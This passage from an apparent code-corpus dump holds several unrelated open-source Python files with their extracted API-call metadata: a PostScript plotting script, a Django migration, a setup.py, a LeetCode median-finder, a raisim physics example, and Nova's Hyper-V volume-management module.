len(xList)-1: continue if len(yList) <= indx: continue y = yList[indx] if isinstance(zList,list): if len(zList) <= indx: continue z = zList[indx] else: z = '' indx += 1 if self.xUniform == True: g_indx = self.xDict[x] print >>self.fout, g_indx, y, z else: print >>self.fout, x, y, z if (indx != 0) and (indx % 1000) == 0: print >>self.fout, endFun+type+'\nbeginFunction\n' if self.xUniform == True: print >>self.fout, g_indx, y, z else: print >>self.fout, x, y, z print >>self.fout, endFun, type, '\n' return #--- GetImage() # def GetImage(self): flog = self.flog print >>self.fout, 'showpage\n' self.fout.flush() os.fsync(self.fout) if self.plotsPerPage == 1: # size = ' -g1200x550 ' size = ' -g%dx%d ' % (self.xSize, self.ySize) xres = int(100 * self.xSize * 6.5 / (1200 * self.xLen)) yres = int(110 * self.ySize / 550) res = ' -r%dx%d ' % (xres, yres) cmdStr = gsPath + ' -sDEVICE=jpeg'+size+'-sOutputFile='+self.foutPath+self.foutName+'.jpg -dNOPAUSE '+ res +self.fname+' -c quit' # cmdStr = gsPath + ' -sDEVICE=jpeg'+size+'-sOutputFile='+self.foutPath+self.foutName+'.jpg -dNOPAUSE -r100x100 '+self.fname+' -c quit' else: size = ' -g1200x1100 ' cmdStr = gsPath + ' -sDEVICE=jpeg'+size+'-sOutputFile='+self.foutPath+self.foutName+'%d.jpg -dNOPAUSE -r100x100 '+self.fname+' -c quit' print >>flog, 'cmdStr: ', cmdStr output = commands.getoutput(cmdStr) print >>flog, 'output from gs command: ', output return self.foutPath+self.foutName+'.jpg' #--- Main # def main(): tMin = 0 tMax = 100000 stateList = [0,1,2,2,3,3,3,3,4] fname = 'sched.txt' if len(sys.argv) == 2: fname = sys.argv[1] elif len(sys.argv) == 3: tMin = int(sys.argv[1]) tMax = int(sys.argv[2]) elif len(sys.argv) == 4: tMin = int(sys.argv[1]) tMax = int(sys.argv[2]) fname = sys.argv[3] elif len(sys.argv) != 1: print 'USAGE: psPlot.py [tMin tMax] [fname]' sys.exit(1) print 'tMin,tMax: ', tMin, tMax, 'fname: ', fname p = PsPlot('./p', 'Header', 'SubHeader', 1) fromStateList = [] toStateList = [] time1List = [] time2List = [] indx = 0 oldTime = 0 fin = open(fname, 'r') for inputLine in fin: inputLine = inputLine.replace(' ','') inputLine = inputLine.replace("'", '') i1 = inputLine.find('(') i2 = inputLine.find(')') inputList = inputLine[i1+1:i2-1].split(',') s1 = stateList[int(inputList[0])] s2 = stateList[int(inputList[1])] t = int(inputList[2]) if indx != 0 and t >= tMin and t <= tMax: fromStateList.append(s1) toStateList.append(s2) time1List.append(oldTime) time2List.append(t) oldTime = t indx += 1 p.SetPlot(tMin, tMax, 0, 0, 2, 0, 'Time', 'Socket/State', 'Chavey\'s Plot') state = 0 while state <= 4: t1List = [] t2List = [] sList = [] indx = 0 for s in toStateList: if s == state: t1List.append(time1List[indx]) t2List.append(time2List[indx]) sList.append(0.10 + s*0.20) indx += 1 p.PlotData(1,t1List, t2List, sList, 'Test', '0.1 in 0 '+p.SetColor(p.colors[state])+' plotWbarsC', sys.stdout) state += 1 image = p.GetImage(sys.stdout) print 'Image file: ', image p.End() if __name__ == "__main__": main()
[]
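GetInc() and GetAxis() in psPlot.py above round axis bounds to convenient values and pick a tick increment before the PostScript axes are drawn. As a hedged illustration only (this is the common power-of-ten approach such routines are built on, not the exact logic above):

import math

def nice_axis(vmin, vmax, max_ticks=10):
    # Simplified sketch; GetInc() above additionally handles fractional ranges,
    # very wide spans and log-scale axes.
    span = (vmax - vmin) or 1.0
    raw_step = span / max_ticks
    magnitude = 10 ** math.floor(math.log10(raw_step))
    step = next(m * magnitude for m in (1, 2, 5, 10) if m * magnitude >= raw_step)
    lo = math.floor(vmin / step) * step
    hi = math.ceil(vmax / step) * step
    return lo, hi, step

print(nice_axis(0, 100000))  # (0.0, 100000.0, 10000.0)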
hamole/physio2go
physio2go/exercises/migrations/0003_auto_20161128_1753.py
ebd14c9406e2b6818dc649e4863a734bf812e9b0
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-28 06:53
from __future__ import unicode_literals

from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ('exercises', '0002_auto_20161128_1718'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='Exercises',
            new_name='Exercise',
        ),
    ]
[((15, 8, 18, 9), 'django.db.migrations.RenameModel', 'migrations.RenameModel', (), '', False, 'from django.db import migrations\n')]
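The migration above only renames the Exercises model to Exercise. For context, a hypothetical model definition that such an auto-generated RenameModel operation would correspond to (the fields shown are made up for illustration):

from django.db import models

# Before this migration the class was named Exercises; afterwards it is Exercise.
class Exercise(models.Model):
    name = models.CharField(max_length=200)      # hypothetical field
    description = models.TextField(blank=True)   # hypothetical field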
pasinskim/mender-python-client
setup.py
d6f3dc86ec46b0b249a112c5037bea579266e649
# Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import setuptools
import re

VERSIONFILE = "src/mender/_version.py"
version_string_line = open(VERSIONFILE, "rt").read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
match = re.search(VSRE, version_string_line, re.M)
if match:
    version_string = match.group(1)
else:
    raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))

with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="mender-python-client-mendersoftware",
    version=version_string,
    license="Apache 2.0",
    author="Mendersoftware",
    author_email="[email protected]",
    description="A Python implementation of the Mender client interface",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/mendersoftware/mender-python-client",
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: Apache Software License",
        "Operating System :: OS Independent",
    ],
    keywords=["mender", "OTA", "updater"],
    packages=setuptools.find_packages(where="src"),
    install_requires=["cryptography", "requests", "msgpack", "websockets"],
    entry_points={"console_scripts": ["mender-python-client=mender.mender:main"]},
    package_dir={"": "src"},
    python_requires=">=3.6",
    zip_safe=False,
    include_package_data=True,
)
[((20, 8, 20, 50), 're.search', 're.search', ({(20, 18, 20, 22): 'VSRE', (20, 24, 20, 43): 'version_string_line', (20, 45, 20, 49): 're.M'}, {}), '(VSRE, version_string_line, re.M)', False, 'import re\n'), ((45, 13, 45, 50), 'setuptools.find_packages', 'setuptools.find_packages', (), '', False, 'import setuptools\n')]
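The setup script above recovers the package version by matching a __version__ line in src/mender/_version.py with the VSRE regex. A small standalone check of that pattern (the sample text is made up):

import re

VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"  # same pattern as in setup.py
sample = '__author__ = "someone"\n__version__ = "1.2.0"\n'

match = re.search(VSRE, sample, re.M)  # re.M makes ^ match at every line start
print(match.group(1) if match else "no version string found")  # -> 1.2.0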
Linchin/python_leetcode_git
Q295-v2.py
3d08ab04bbdbd2ce268f33c501fbb149662872c7
""" 295 find median from data stream hard """ from heapq import * class MedianFinder: # max heap and min heap def __init__(self): """ initialize your data structure here. """ self.hi = [] self.lo = [] def addNum(self, num: int) -> None: heappush(self.lo, -heappushpop(self.hi, num)) while len(self.lo) > len(self.hi): heappush(self.hi, -heappop(self.lo)) def findMedian(self) -> float: if len(self.hi) > len(self.lo): return self.hi[0] if len(self.hi) == len(self.lo): return (self.hi[0] - self.lo[0]) / 2.0 sol = MedianFinder() sol.addNum(1) print(sol.findMedian()) sol.addNum(2) print(sol.findMedian())
[]
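A quick usage check of the two-heap MedianFinder above: hi (a min-heap) keeps the upper half of the stream, lo keeps the lower half as negated values so Python's min-heap behaves as a max-heap, and hi may be one element longer, so the median is either hi[0] or the average of the two heap tops.

mf = MedianFinder()
for n in (5, 15, 1, 3):
    mf.addNum(n)
    print(n, mf.findMedian())
# Prints: 5 5, then 15 10.0, then 1 5, then 3 4.0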
mstoelzle/raisimLib
raisimPy/examples/newtonsCradle.py
81f33a1b82f296e9622f950bc292f61bee2d2c2f
import os
import numpy as np
import raisimpy as raisim
import math
import time

raisim.World.setLicenseFile(os.path.dirname(os.path.abspath(__file__)) + "/../../rsc/activation.raisim")
world = raisim.World()
ground = world.addGround()
world.setTimeStep(0.001)
world.setMaterialPairProp("steel", "steel", 0.1, 1.0, 0.0)

pin1 = world.addSphere(0.1, 0.8)
pin1.setAppearance("1,0,0,0.3")
pin1.setPosition(0.0, 0.0, 3.0)
pin1.setBodyType(raisim.BodyType.STATIC)

pin2 = world.addSphere(0.1, 0.8)
pin2.setAppearance("0,1,0,0.3")
pin2.setPosition(0.3, 0.0, 3.0)
pin2.setBodyType(raisim.BodyType.STATIC)

pin3 = world.addSphere(0.1, 0.8)
pin3.setAppearance("0,0,1,0.3")
pin3.setPosition(0.6, 0.0, 3.0)
pin3.setBodyType(raisim.BodyType.STATIC)

pin4 = world.addSphere(0.1, 0.8)
pin4.setAppearance("1,0,0,0.3")
pin4.setPosition(0.9, 0.0, 3.0)
pin4.setBodyType(raisim.BodyType.STATIC)

pin5 = world.addSphere(0.1, 0.8)
pin5.setPosition(0.9, 0.0, 6.0)
pin5.setBodyType(raisim.BodyType.STATIC)

pin6 = world.addSphere(0.1, 0.8)
pin6.setPosition(-3., 0.0, 7.0)
pin6.setBodyType(raisim.BodyType.STATIC)

pin7 = world.addSphere(0.1, 0.8)
pin7.setPosition(-4., 0.0, 7.0)
pin7.setBodyType(raisim.BodyType.STATIC)

anymalB_urdf_file = os.path.dirname(os.path.abspath(__file__)) + "/../../rsc/anymal/urdf/anymal.urdf"
anymalC_urdf_file = os.path.dirname(os.path.abspath(__file__)) + "/../../rsc/anymal_c/urdf/anymal.urdf"
anymalC = world.addArticulatedSystem(anymalC_urdf_file)
anymalB = world.addArticulatedSystem(anymalB_urdf_file)

jointNominalConfig = np.array([-3, 0, 4.54, 1.0, 0.0, 0.0, 0.0, 0.03, 0.4, -0.8, -0.03, 0.4, -0.8, 0.03, -0.4, 0.8, -0.03, -0.4, 0.8])
jointVelocityTarget = np.zeros([anymalC.getDOF()])
jointPgain = np.ones(anymalC.getDOF()) * 100.0
jointDgain = np.ones(anymalC.getDOF()) * 1.0

anymalC.setGeneralizedCoordinate(jointNominalConfig)
anymalC.setPdGains(jointPgain, jointDgain)
anymalC.setPdTarget(jointNominalConfig, jointVelocityTarget)
anymalC.setName("anymalC")

jointNominalConfig[0] = -4
anymalB.setGeneralizedCoordinate(jointNominalConfig)
anymalB.setPdGains(jointPgain, jointDgain)
anymalB.setPdTarget(jointNominalConfig, jointVelocityTarget)
anymalB.setName("anymalB")

ball1 = world.addSphere(0.1498, 0.8, "steel")
ball1.setPosition(0, 0.0, 1.0)

ball2 = world.addSphere(0.1499, 0.8, "steel")
ball2.setPosition(0.3, 0.0, 1.0)

ball3 = world.addSphere(0.1499, 0.8, "steel")
ball3.setPosition(0.6, 0.0, 1.0)

ball4 = world.addSphere(0.1499, 0.8, "steel")
ball4.setPosition(2.9, 0.0, 3.0)

box = world.addBox(.1, .1, .1, 1)
box.setPosition(0.9, 0.0, 4.2)

world.addStiffWire(pin1, 0, np.zeros(3), ball1, 0, np.zeros(3), 2.0)
world.addStiffWire(pin2, 0, np.zeros(3), ball2, 0, np.zeros(3), 2.0)
world.addStiffWire(pin3, 0, np.zeros(3), ball3, 0, np.zeros(3), 2.0)
world.addStiffWire(pin4, 0, np.zeros(3), ball4, 0, np.zeros(3), 2.0)

wire5 = world.addCompliantWire(pin5, 0, np.zeros(3), box, 0, np.zeros(3), 2.0, 200)
wire5.setStretchType(raisim.StretchType.BOTH)

wire6 = world.addCompliantWire(pin6, 0, np.zeros(3), anymalC, 0, np.zeros(3), 2.0, 1000)
wire6.setStretchType(raisim.StretchType.BOTH)

wire7 = world.addCustomWire(pin7, 0, np.zeros(3), anymalB, 0, np.zeros(3), 2.0)
wire7.setTension(310)

server = raisim.RaisimServer(world)
server.launchServer(8080)

for i in range(500000):
    time.sleep(0.001)
    server.integrateWorldThreadSafe()
    if i == 5000:
        world.removeObject(wire7)

server.killServer()
[((8, 8, 8, 22), 'raisimpy.World', 'raisim.World', ({}, {}), '()', True, 'import raisimpy as raisim\n'), ((52, 21, 52, 134), 'numpy.array', 'np.array', ({(52, 30, 52, 133): '[-3, 0, 4.54, 1.0, 0.0, 0.0, 0.0, 0.03, 0.4, -0.8, -0.03, 0.4, -0.8, 0.03, \n -0.4, 0.8, -0.03, -0.4, 0.8]'}, {}), '([-3, 0, 4.54, 1.0, 0.0, 0.0, 0.0, 0.03, 0.4, -0.8, -0.03, 0.4, -\n 0.8, 0.03, -0.4, 0.8, -0.03, -0.4, 0.8])', True, 'import numpy as np\n'), ((97, 9, 97, 35), 'raisimpy.RaisimServer', 'raisim.RaisimServer', ({(97, 29, 97, 34): 'world'}, {}), '(world)', True, 'import raisimpy as raisim\n'), ((83, 28, 83, 39), 'numpy.zeros', 'np.zeros', ({(83, 37, 83, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((83, 51, 83, 62), 'numpy.zeros', 'np.zeros', ({(83, 60, 83, 61): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((84, 28, 84, 39), 'numpy.zeros', 'np.zeros', ({(84, 37, 84, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((84, 51, 84, 62), 'numpy.zeros', 'np.zeros', ({(84, 60, 84, 61): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((85, 28, 85, 39), 'numpy.zeros', 'np.zeros', ({(85, 37, 85, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((85, 51, 85, 62), 'numpy.zeros', 'np.zeros', ({(85, 60, 85, 61): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((86, 28, 86, 39), 'numpy.zeros', 'np.zeros', ({(86, 37, 86, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((86, 51, 86, 62), 'numpy.zeros', 'np.zeros', ({(86, 60, 86, 61): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((88, 40, 88, 51), 'numpy.zeros', 'np.zeros', ({(88, 49, 88, 50): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((88, 61, 88, 72), 'numpy.zeros', 'np.zeros', ({(88, 70, 88, 71): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((91, 40, 91, 51), 'numpy.zeros', 'np.zeros', ({(91, 49, 91, 50): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((91, 65, 91, 76), 'numpy.zeros', 'np.zeros', ({(91, 74, 91, 75): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((94, 37, 94, 48), 'numpy.zeros', 'np.zeros', ({(94, 46, 94, 47): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((94, 62, 94, 73), 'numpy.zeros', 'np.zeros', ({(94, 71, 94, 72): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((101, 4, 101, 21), 'time.sleep', 'time.sleep', ({(101, 15, 101, 20): '(0.001)'}, {}), '(0.001)', False, 'import time\n'), ((46, 36, 46, 61), 'os.path.abspath', 'os.path.abspath', ({(46, 52, 46, 60): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((47, 36, 47, 61), 'os.path.abspath', 'os.path.abspath', ({(47, 52, 47, 60): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((7, 44, 7, 69), 'os.path.abspath', 'os.path.abspath', ({(7, 60, 7, 68): '__file__'}, {}), '(__file__)', False, 'import os\n')]
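One detail of the script above worth spelling out: setGeneralizedCoordinate receives 19 values (3 base position + 4 quaternion + 12 joint angles), while the gain and velocity-target vectors are sized by getDOF(), which for this floating-base robot should be 18 (6 base DOF + 12 joints) because the unit quaternion carries one redundant entry. A small numpy check of the configuration length:

import numpy as np

q = np.array([-3, 0, 4.54,               # base position
              1.0, 0.0, 0.0, 0.0,        # base orientation quaternion
              0.03, 0.4, -0.8, -0.03, 0.4, -0.8,
              0.03, -0.4, 0.8, -0.03, -0.4, 0.8])  # 12 joint angles
print(q.size)      # 19 generalized coordinates
print(q.size - 1)  # 18, the expected DOF count for a floating base plus 12 joints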
viveknandavanam/nova
nova/virt/hyperv/volumeops.py
556377b6915936467436c9d5bb33bc0e22244e1e
# Copyright 2012 Pedro Navarro Perez # Copyright 2013 Cloudbase Solutions Srl # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Management class for Storage-related functions (attach, detach, etc). """ import time from os_brick.initiator import connector from os_win import utilsfactory from oslo_log import log as logging from oslo_utils import strutils import nova.conf from nova import exception from nova.i18n import _, _LE, _LI, _LW from nova import utils from nova.virt import driver from nova.virt.hyperv import constants LOG = logging.getLogger(__name__) CONF = nova.conf.CONF class VolumeOps(object): """Management class for Volume-related tasks """ def __init__(self): self._vmutils = utilsfactory.get_vmutils() self._default_root_device = 'vda' self.volume_drivers = { constants.STORAGE_PROTOCOL_SMBFS: SMBFSVolumeDriver(), constants.STORAGE_PROTOCOL_ISCSI: ISCSIVolumeDriver(), constants.STORAGE_PROTOCOL_FC: FCVolumeDriver()} def _get_volume_driver(self, connection_info): driver_type = connection_info.get('driver_volume_type') if driver_type not in self.volume_drivers: raise exception.VolumeDriverNotFound(driver_type=driver_type) return self.volume_drivers[driver_type] def attach_volumes(self, volumes, instance_name): for vol in volumes: self.attach_volume(vol['connection_info'], instance_name) def disconnect_volumes(self, block_device_info): mapping = driver.block_device_info_get_mapping(block_device_info) for vol in mapping: self.disconnect_volume(vol['connection_info']) def attach_volume(self, connection_info, instance_name, disk_bus=constants.CTRL_TYPE_SCSI): tries_left = CONF.hyperv.volume_attach_retry_count + 1 while tries_left: try: self._attach_volume(connection_info, instance_name, disk_bus) break except Exception as ex: tries_left -= 1 if not tries_left: LOG.exception( _LE("Failed to attach volume %(connection_info)s " "to instance %(instance_name)s. "), {'connection_info': strutils.mask_dict_password( connection_info), 'instance_name': instance_name}) self.disconnect_volume(connection_info) raise exception.VolumeAttachFailed( volume_id=connection_info['serial'], reason=ex) else: LOG.warning( _LW("Failed to attach volume %(connection_info)s " "to instance %(instance_name)s. 
" "Tries left: %(tries_left)s."), {'connection_info': strutils.mask_dict_password( connection_info), 'instance_name': instance_name, 'tries_left': tries_left}) time.sleep(CONF.hyperv.volume_attach_retry_interval) def _attach_volume(self, connection_info, instance_name, disk_bus=constants.CTRL_TYPE_SCSI): LOG.debug( "Attaching volume: %(connection_info)s to %(instance_name)s", {'connection_info': strutils.mask_dict_password(connection_info), 'instance_name': instance_name}) volume_driver = self._get_volume_driver(connection_info) volume_driver.attach_volume(connection_info, instance_name, disk_bus) qos_specs = connection_info['data'].get('qos_specs') or {} if qos_specs: volume_driver.set_disk_qos_specs(connection_info, qos_specs) def disconnect_volume(self, connection_info): volume_driver = self._get_volume_driver(connection_info) volume_driver.disconnect_volume(connection_info) def detach_volume(self, connection_info, instance_name): LOG.debug("Detaching volume: %(connection_info)s " "from %(instance_name)s", {'connection_info': strutils.mask_dict_password( connection_info), 'instance_name': instance_name}) volume_driver = self._get_volume_driver(connection_info) volume_driver.detach_volume(connection_info, instance_name) volume_driver.disconnect_volume(connection_info) def fix_instance_volume_disk_paths(self, instance_name, block_device_info): # Mapping containing the current disk paths for each volume. actual_disk_mapping = self.get_disk_path_mapping(block_device_info) if not actual_disk_mapping: return # Mapping containing virtual disk resource path and the physical # disk path for each volume serial number. The physical path # associated with this resource may not be the right one, # as physical disk paths can get swapped after host reboots. vm_disk_mapping = self._vmutils.get_vm_physical_disk_mapping( instance_name) for serial, vm_disk in vm_disk_mapping.items(): actual_disk_path = actual_disk_mapping[serial] if vm_disk['mounted_disk_path'] != actual_disk_path: self._vmutils.set_disk_host_res(vm_disk['resource_path'], actual_disk_path) def get_volume_connector(self): # NOTE(lpetrut): the Windows os-brick connectors # do not use a root helper. conn = connector.get_connector_properties( root_helper=None, my_ip=CONF.my_block_storage_ip, multipath=CONF.hyperv.use_multipath_io, enforce_multipath=True, host=CONF.host) return conn def connect_volumes(self, block_device_info): mapping = driver.block_device_info_get_mapping(block_device_info) for vol in mapping: connection_info = vol['connection_info'] volume_driver = self._get_volume_driver(connection_info) volume_driver.connect_volume(connection_info) def get_disk_path_mapping(self, block_device_info): block_mapping = driver.block_device_info_get_mapping(block_device_info) disk_path_mapping = {} for vol in block_mapping: connection_info = vol['connection_info'] disk_serial = connection_info['serial'] disk_path = self.get_disk_resource_path(connection_info) disk_path_mapping[disk_serial] = disk_path return disk_path_mapping def get_disk_resource_path(self, connection_info): volume_driver = self._get_volume_driver(connection_info) return volume_driver.get_disk_resource_path(connection_info) @staticmethod def bytes_per_sec_to_iops(no_bytes): # Hyper-v uses normalized IOPS (8 KB increments) # as IOPS allocation units. 
return ( (no_bytes + constants.IOPS_BASE_SIZE - 1) // constants.IOPS_BASE_SIZE) @staticmethod def validate_qos_specs(qos_specs, supported_qos_specs): unsupported_specs = set(qos_specs.keys()).difference( supported_qos_specs) if unsupported_specs: msg = (_LW('Got unsupported QoS specs: ' '%(unsupported_specs)s. ' 'Supported qos specs: %(supported_qos_specs)s') % {'unsupported_specs': unsupported_specs, 'supported_qos_specs': supported_qos_specs}) LOG.warning(msg) class BaseVolumeDriver(object): _is_block_dev = True _protocol = None _extra_connector_args = {} def __init__(self): self._conn = None self._diskutils = utilsfactory.get_diskutils() self._vmutils = utilsfactory.get_vmutils() @property def _connector(self): if not self._conn: scan_attempts = CONF.hyperv.mounted_disk_query_retry_count scan_interval = CONF.hyperv.mounted_disk_query_retry_interval self._conn = connector.InitiatorConnector.factory( protocol=self._protocol, root_helper=None, use_multipath=CONF.hyperv.use_multipath_io, device_scan_attempts=scan_attempts, device_scan_interval=scan_interval, **self._extra_connector_args) return self._conn def connect_volume(self, connection_info): return self._connector.connect_volume(connection_info['data']) def disconnect_volume(self, connection_info): self._connector.disconnect_volume(connection_info['data']) def get_disk_resource_path(self, connection_info): disk_paths = self._connector.get_volume_paths(connection_info['data']) if not disk_paths: vol_id = connection_info['serial'] err_msg = _("Could not find disk path. Volume id: %s") raise exception.DiskNotFound(err_msg % vol_id) return self._get_disk_res_path(disk_paths[0]) def _get_disk_res_path(self, disk_path): if self._is_block_dev: # We need the Msvm_DiskDrive resource path as this # will be used when the disk is attached to an instance. disk_number = self._diskutils.get_device_number_from_device_name( disk_path) disk_res_path = self._vmutils.get_mounted_disk_by_drive_number( disk_number) else: disk_res_path = disk_path return disk_res_path def attach_volume(self, connection_info, instance_name, disk_bus=constants.CTRL_TYPE_SCSI): dev_info = self.connect_volume(connection_info) serial = connection_info['serial'] disk_path = self._get_disk_res_path(dev_info['path']) ctrller_path, slot = self._get_disk_ctrl_and_slot(instance_name, disk_bus) if self._is_block_dev: # We need to tag physical disk resources with the volume # serial number, in order to be able to retrieve them # during live migration. self._vmutils.attach_volume_to_controller(instance_name, ctrller_path, slot, disk_path, serial=serial) else: self._vmutils.attach_drive(instance_name, disk_path, ctrller_path, slot) def detach_volume(self, connection_info, instance_name): disk_path = self.get_disk_resource_path(connection_info) LOG.debug("Detaching disk %(disk_path)s " "from instance: %(instance_name)s", dict(disk_path=disk_path, instance_name=instance_name)) self._vmutils.detach_vm_disk(instance_name, disk_path, is_physical=self._is_block_dev) def _get_disk_ctrl_and_slot(self, instance_name, disk_bus): if disk_bus == constants.CTRL_TYPE_IDE: # Find the IDE controller for the vm. 
ctrller_path = self._vmutils.get_vm_ide_controller( instance_name, 0) # Attaching to the first slot slot = 0 else: # Find the SCSI controller for the vm ctrller_path = self._vmutils.get_vm_scsi_controller( instance_name) slot = self._vmutils.get_free_controller_slot(ctrller_path) return ctrller_path, slot def set_disk_qos_specs(self, connection_info, disk_qos_specs): LOG.info(_LI("The %(protocol)s Hyper-V volume driver " "does not support QoS. Ignoring QoS specs."), dict(protocol=self._protocol)) class ISCSIVolumeDriver(BaseVolumeDriver): _is_block_dev = True _protocol = constants.STORAGE_PROTOCOL_ISCSI def __init__(self, *args, **kwargs): self._extra_connector_args = dict( initiator_list=CONF.hyperv.iscsi_initiator_list) super(ISCSIVolumeDriver, self).__init__(*args, **kwargs) class SMBFSVolumeDriver(BaseVolumeDriver): _is_block_dev = False _protocol = constants.STORAGE_PROTOCOL_SMBFS _extra_connector_args = dict(local_path_for_loopback=True) def export_path_synchronized(f): def wrapper(inst, connection_info, *args, **kwargs): export_path = inst._get_export_path(connection_info) @utils.synchronized(export_path) def inner(): return f(inst, connection_info, *args, **kwargs) return inner() return wrapper def _get_export_path(self, connection_info): return connection_info['data']['export'].replace('/', '\\') @export_path_synchronized def attach_volume(self, *args, **kwargs): super(SMBFSVolumeDriver, self).attach_volume(*args, **kwargs) @export_path_synchronized def disconnect_volume(self, *args, **kwargs): # We synchronize those operations based on the share path in order to # avoid the situation when a SMB share is unmounted while a volume # exported by it is about to be attached to an instance. super(SMBFSVolumeDriver, self).disconnect_volume(*args, **kwargs) def set_disk_qos_specs(self, connection_info, qos_specs): supported_qos_specs = ['total_iops_sec', 'total_bytes_sec'] VolumeOps.validate_qos_specs(qos_specs, supported_qos_specs) total_bytes_sec = int(qos_specs.get('total_bytes_sec') or 0) total_iops_sec = int(qos_specs.get('total_iops_sec') or VolumeOps.bytes_per_sec_to_iops( total_bytes_sec)) if total_iops_sec: disk_path = self.get_disk_resource_path(connection_info) self._vmutils.set_disk_qos_specs(disk_path, total_iops_sec) class FCVolumeDriver(BaseVolumeDriver): _is_block_dev = True _protocol = constants.STORAGE_PROTOCOL_FC
[((34, 6, 34, 33), 'oslo_log.log.getLogger', 'logging.getLogger', ({(34, 24, 34, 32): '__name__'}, {}), '(__name__)', True, 'from oslo_log import log as logging\n'), ((44, 24, 44, 50), 'os_win.utilsfactory.get_vmutils', 'utilsfactory.get_vmutils', ({}, {}), '()', False, 'from os_win import utilsfactory\n'), ((62, 18, 62, 73), 'nova.virt.driver.block_device_info_get_mapping', 'driver.block_device_info_get_mapping', ({(62, 55, 62, 72): 'block_device_info'}, {}), '(block_device_info)', False, 'from nova.virt import driver\n'), ((154, 15, 159, 27), 'os_brick.initiator.connector.get_connector_properties', 'connector.get_connector_properties', (), '', False, 'from os_brick.initiator import connector\n'), ((163, 18, 163, 73), 'nova.virt.driver.block_device_info_get_mapping', 'driver.block_device_info_get_mapping', ({(163, 55, 163, 72): 'block_device_info'}, {}), '(block_device_info)', False, 'from nova.virt import driver\n'), ((170, 24, 170, 79), 'nova.virt.driver.block_device_info_get_mapping', 'driver.block_device_info_get_mapping', ({(170, 61, 170, 78): 'block_device_info'}, {}), '(block_device_info)', False, 'from nova.virt import driver\n'), ((212, 26, 212, 54), 'os_win.utilsfactory.get_diskutils', 'utilsfactory.get_diskutils', ({}, {}), '()', False, 'from os_win import utilsfactory\n'), ((213, 24, 213, 50), 'os_win.utilsfactory.get_vmutils', 'utilsfactory.get_vmutils', ({}, {}), '()', False, 'from os_win import utilsfactory\n'), ((54, 18, 54, 73), 'nova.exception.VolumeDriverNotFound', 'exception.VolumeDriverNotFound', (), '', False, 'from nova import exception\n'), ((221, 25, 227, 45), 'os_brick.initiator.connector.InitiatorConnector.factory', 'connector.InitiatorConnector.factory', (), '', False, 'from os_brick.initiator import connector\n'), ((240, 22, 240, 66), 'nova.i18n._', '_', ({(240, 24, 240, 65): '"""Could not find disk path. Volume id: %s"""'}, {}), "('Could not find disk path. Volume id: %s')", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((241, 18, 241, 58), 'nova.exception.DiskNotFound', 'exception.DiskNotFound', ({(241, 41, 241, 57): '(err_msg % vol_id)'}, {}), '(err_msg % vol_id)', False, 'from nova import exception\n'), ((305, 17, 306, 65), 'nova.i18n._LI', '_LI', ({(305, 21, 306, 64): '"""The %(protocol)s Hyper-V volume driver does not support QoS. Ignoring QoS specs."""'}, {}), "('The %(protocol)s Hyper-V volume driver does not support QoS. Ignoring QoS specs.'\n )", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((330, 13, 330, 44), 'nova.utils.synchronized', 'utils.synchronized', ({(330, 32, 330, 43): 'export_path'}, {}), '(export_path)', False, 'from nova import utils\n'), ((106, 32, 106, 76), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', ({(106, 60, 106, 75): 'connection_info'}, {}), '(connection_info)', False, 'from oslo_utils import strutils\n'), ((125, 38, 126, 38), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', ({(126, 22, 126, 37): 'connection_info'}, {}), '(connection_info)', False, 'from oslo_utils import strutils\n'), ((197, 19, 199, 70), 'nova.i18n._LW', '_LW', ({(197, 23, 199, 69): '"""Got unsupported QoS specs: %(unsupported_specs)s. Supported qos specs: %(supported_qos_specs)s"""'}, {}), "('Got unsupported QoS specs: %(unsupported_specs)s. 
